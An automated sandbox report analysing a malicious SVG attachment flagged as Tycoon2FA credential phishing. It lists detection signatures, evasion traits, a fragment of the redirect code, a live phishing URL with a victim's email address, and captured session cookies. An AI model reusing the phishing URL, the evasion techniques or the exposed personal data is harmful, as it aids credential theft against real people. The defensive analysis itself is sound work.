Edit tour

Windows Analysis Report
FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg

Overview

General Information

Sample name:FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg
Analysis ID:1646686
MD5:8174817b1f970afab3559c459ca04c67
SHA1:526676688ad585150faaa81c33953cbade134786
SHA256:432178434ba76ee05845b3c5e7bf45fdabe76a0ea747e0b6d09f104cb2225683
Infos:

Detection

Invisible JS, Tycoon2FA
Score:84
Range:0 - 100
Confidence:100%

Signatures

Yara detected AntiDebug via timestamp check
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
HTML page contains suspicious javascript code
Yara detected JavaScript embedded in SVG
Creates files inside the system directory
Deletes files inside the Windows folder
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w11x64_office
  • chrome.exe (PID: 6924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)
    • chrome.exe (PID: 3600 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1908,i,12973504313424572238,13237224200463066613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=1748 /prefetch:11 MD5: DBE43C1D0092437B88CFF7BD9ABC336C)
  • chrome.exe (PID: 7844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svgJoeSecurity_JavaScriptembeddedinSVGYara detected JavaScript embedded in SVGJoe Security
    FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svgJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
      SourceRuleDescriptionAuthorStrings
      0.0..script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
        1.4.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
          1.4.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
            1.6.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
              1.3.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
                Click to see the 6 entries
                No Sigma rule has matched
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                Phishing

                barindex
                Source: Yara matchFile source: 1.3.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.1.pages.csv, type: HTML
                Source: Yara matchFile source: 1.0.pages.csv, type: HTML
                Source: Yara matchFile source: FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg, type: SAMPLE
                Source: Yara matchFile source: 0.0..script.csv, type: HTML
                Source: Yara matchFile source: 1.3.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.7..script.csv, type: HTML
                Source: Yara matchFile source: 1.1.pages.csv, type: HTML
                Source: Yara matchFile source: 1.0.pages.csv, type: HTML
                Source: Yara matchFile source: 1.4.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.6.d.script.csv, type: HTML
                Source: 1.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftwo... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` to decode base64-encoded strings, followed by `eval()` to execute the decoded content, poses a significant security risk. Additionally, the script appears to be sending user data to an untrusted domain, which is a clear indicator of malicious intent. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
                Source: 1.7..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftwo... This script demonstrates high-risk behaviors, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.
                Source: file:///C:/Users/user/Desktop/FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svgHTTP Parser: window.location.href = atob(
                Source: Yara matchFile source: FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg, type: SAMPLE
                Source: https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftworx.comHTTP Parser: No favicon
                Source: https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftworx.comHTTP Parser: No favicon
                Source: unknownHTTPS traffic detected: 142.251.32.100:443 -> 192.168.2.24:60832 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.24:60834 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.24:60835 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.24:60836 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.24:60839 version: TLS 1.2
                Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1742797155074&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1Accept-Encoding: gzip, deflateContent-Length: 3656Content-Type: application/json; charset=UTF-8Host: browser.events.data.msn.cnConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
                Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
                Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.195
                Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.195
                Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.195
                Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.195
                Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.195
                Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.195
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.161.139
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.161.139
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.161.139
                Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
                Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.195
                Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.195
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
                Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /8VVgl7/$christo@draftworx.com HTTP/1.1Host: mo.zonqdkqezktw.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mo.zonqdkqezktw.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mo.zonqdkqezktw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftworx.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InB6Y2JUNkJ5NXBpYlFQQmdoQ1dIVnc9PSIsInZhbHVlIjoidTJEblVVM1dlbHplTlhLcHQrM0JDK2FiaFQ2YVhMOVhMTzYzczZiSVJzN2IzOWRHQStoWmZOOUNFNHFQL2JIYjE2MGFJY09CWTVjbE1tM2hMemttMzdTdENLODNBU2RZdVQ0MklRT1ZUcXdheG1NeEFPcGx2Z2k1bG40YzFTTnMiLCJtYWMiOiJkNjlhODY5NWI2OTZhMTMzYmY5NTA2NmZhY2M0MjNkYTAzYjRlZTJjYzQwZTQ0MmFkZTc2ZmQ0NjI1YmU0YWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjBMMWhLN1c0Nyt4aDlPMlgvU3pwWUE9PSIsInZhbHVlIjoiWmhRcUY0MFRLRTVvSVNXMVM1UDZ4Nmx4dDJIWGhXaFlRNjUxOFZHeUFqV0dUdDRPcmZZdDZ6eEN4aHRLLzlEaXdiNGEyY3R2Rk1BYXluSWdSU1VvOW94alNUek5mV0t0ZmovUlkxaHFNbFp4am1lVUNsa0FrSHhzeUxrNVZCUDIiLCJtYWMiOiI5OWIxYmNhZDIxZjJiNDU3NjFlMDYyMzFmZjUzMzM1MjM0ZGJkMTA4YzY4MGVkZTI3N2M5YTAzYTRjOTNmMTFjIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                Source: global trafficHTTP traffic detected: GET /r/r1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.cn
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: mo.zonqdkqezktw.es
                Source: global trafficDNS traffic detected: DNS query: code.jquery.com
                Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
                Source: unknownHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1742797155074&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1Accept-Encoding: gzip, deflateContent-Length: 3656Content-Type: application/json; charset=UTF-8Host: browser.events.data.msn.cnConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 06:19:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uun%2BxGZQ51yblYIFmruPNj8lKOgKuUQ5kLkzGqYNzI7xHwz6eih1ATQCYenedh2K7ZGTGxTzpGIxxCS2TGeRcIcH6L4%2B%2BjEMFU8%2BmhE0R4MqrPmzHy5XqIam0XAFvjSyhJaX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=334&min_rtt=316&rtt_var=124&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2820&recv_bytes=2266&delivery_rate=9026785&cwnd=252&unsent_bytes=0&cid=f1e1fc67d8a9b90e&ts=167&x=0"Cache-Control: max-age=14400Server: cloudflareCF-RAY: 92540eb6fafa2142-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=98686&min_rtt=97536&rtt_var=21740&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1923&delivery_rate=38157&cwnd=249&unsent_bytes=0&cid=0740d767012a2c32&ts=2107&x=0"
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60818
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60839
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60817
                Source: unknownNetwork traffic detected: HTTP traffic on port 60822 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60817 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60853 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60839 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60840
                Source: unknownNetwork traffic detected: HTTP traffic on port 60835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60860
                Source: unknownNetwork traffic detected: HTTP traffic on port 60836 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60840 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60832 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60836
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60835
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60822
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60832
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60853
                Source: unknownHTTPS traffic detected: 142.251.32.100:443 -> 192.168.2.24:60832 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.24:60834 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.24:60835 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.24:60836 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.24:60839 version: TLS 1.2
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6924_2083986824Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6924_2083986824Jump to behavior
                Source: classification engineClassification label: mal84.phis.evad.winSVG@23/6@9/5
                Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1908,i,12973504313424572238,13237224200463066613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=1748 /prefetch:11
                Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1908,i,12973504313424572238,13237224200463066613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=1748 /prefetch:11Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: 1.4.d.script.csv, type: HTML
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                Browser Extensions
                1
                Process Injection
                1
                Masquerading
                OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Process Injection
                LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                File Deletion
                Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
                Ingress Tool Transfer
                Traffic DuplicationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1646686 Sample: FaxLine832699141Sharepoint_... Startdate: 24/03/2025 Architecture: WINDOWS Score: 84 15 onedscolprdeus00.eastus.cloudapp.azure.com 2->15 17 global.asimov.events.data.trafficmanager.net 2->17 19 browser.events.data.msn.cn 2->19 29 Yara detected AntiDebug via timestamp check 2->29 31 Yara detected Tycoon 2FA PaaS 2->31 33 Yara detected Obfuscation Via HangulCharacter 2->33 35 4 other signatures 2->35 7 chrome.exe 2 2->7         started        10 chrome.exe 2->10         started        signatures3 process4 dnsIp5 21 192.168.2.24, 137, 138, 443 unknown unknown 7->21 12 chrome.exe 7->12         started        process6 dnsIp7 23 mo.zonqdkqezktw.es 104.21.80.1, 443, 60834, 60835 CLOUDFLARENETUS United States 12->23 25 www.google.com 142.251.32.100, 443, 60832, 60853 GOOGLEUS United States 12->25 27 2 other IPs or domains 12->27

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://mo.zonqdkqezktw.es/favicon.ico0%Avira URL Cloudsafe

                Download Network PCAP: filteredfull

                NameIPActiveMaliciousAntivirus DetectionReputation
                mo.zonqdkqezktw.es
                104.21.80.1
                truetrue
                  unknown
                  a.nel.cloudflare.com
                  35.190.80.1
                  truefalse
                    high
                    code.jquery.com
                    151.101.194.137
                    truefalse
                      high
                      onedscolprdeus00.eastus.cloudapp.azure.com
                      20.42.72.131
                      truefalse
                        high
                        www.google.com
                        142.251.32.100
                        truefalse
                          high
                          browser.events.data.msn.cn
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftworx.comfalse
                              unknown
                              https://mo.zonqdkqezktw.es/favicon.icofalse
                              • Avira URL Cloud: safe
                              unknown
                              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                high
                                https://a.nel.cloudflare.com/report/v4?s=Uun%2BxGZQ51yblYIFmruPNj8lKOgKuUQ5kLkzGqYNzI7xHwz6eih1ATQCYenedh2K7ZGTGxTzpGIxxCS2TGeRcIcH6L4%2B%2BjEMFU8%2BmhE0R4MqrPmzHy5XqIam0XAFvjSyhJaXfalse
                                  high
                                  https://browser.events.data.msn.cn/OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1742797155074&w=0&anoncknm=al_app_anon&NoResponseBody=truefalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    104.21.80.1
                                    mo.zonqdkqezktw.esUnited States
                                    13335CLOUDFLARENETUStrue
                                    142.251.32.100
                                    www.google.comUnited States
                                    15169GOOGLEUSfalse
                                    151.101.194.137
                                    code.jquery.comUnited States
                                    54113FASTLYUSfalse
                                    35.190.80.1
                                    a.nel.cloudflare.comUnited States
                                    15169GOOGLEUSfalse
                                    IP
                                    192.168.2.24
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1646686
                                    Start date and time:2025-03-24 07:18:20 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 45s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                                    Number of analysed new started processes analysed:17
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg
                                    Detection:MAL
                                    Classification:mal84.phis.evad.winSVG@23/6@9/5
                                    Cookbook Comments:
                                    • Found application associated with file extension: .svg
                                    • Exclude process from analysis (whitelisted): SystemSettingsBroker.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 199.232.210.172, 142.251.32.99, 142.250.65.206, 142.251.40.174, 172.253.115.84, 142.250.176.206, 142.250.80.46, 142.250.81.238, 142.250.65.170, 142.250.80.106, 142.250.64.106, 142.251.40.106, 142.250.176.202, 142.250.72.106, 142.251.40.170, 142.251.40.234, 142.250.80.74, 142.251.41.10, 142.251.40.138, 172.217.165.138, 142.250.80.10, 142.250.80.42, 142.251.40.202, 142.250.64.74, 23.219.161.105, 142.251.32.110, 142.251.40.206, 142.250.65.234, 142.251.32.106, 142.250.81.234, 142.250.65.202, 142.251.40.227, 142.250.80.35, 142.250.80.78, 142.251.40.110, 172.202.163.200
                                    • Excluded domains from analysis (whitelisted): accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, www.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenFile calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    No simulations
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    151.101.194.137http://2gewf232.blogspot.com.au/Get hashmaliciousUnknownBrowse
                                    • code.jquery.com/jquery.min.js
                                    https://kjhgt55555555555.blogspot.com/Get hashmaliciousUnknownBrowse
                                    • code.jquery.com/jquery.min.js
                                    http://kjhgt55555555555.blogspot.cz/Get hashmaliciousUnknownBrowse
                                    • code.jquery.com/jquery.min.js
                                    http://facebooksecurity.blogspot.ro/Get hashmaliciousUnknownBrowse
                                    • code.jquery.com/jquery-1.7.min.js
                                    http://facebooksecurity.blogspot.dk/Get hashmaliciousUnknownBrowse
                                    • code.jquery.com/jquery-1.7.min.js
                                    http://soporte-store.info/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                    • code.jquery.com/jquery-1.11.3.min.js
                                    http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                    • code.jquery.com/jquery-1.11.3.min.js
                                    http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/Get hashmaliciousUnknownBrowse
                                    • code.jquery.com/jquery-1.9.1.js
                                    http://facebooksecurity.blogspot.pe/Get hashmaliciousUnknownBrowse
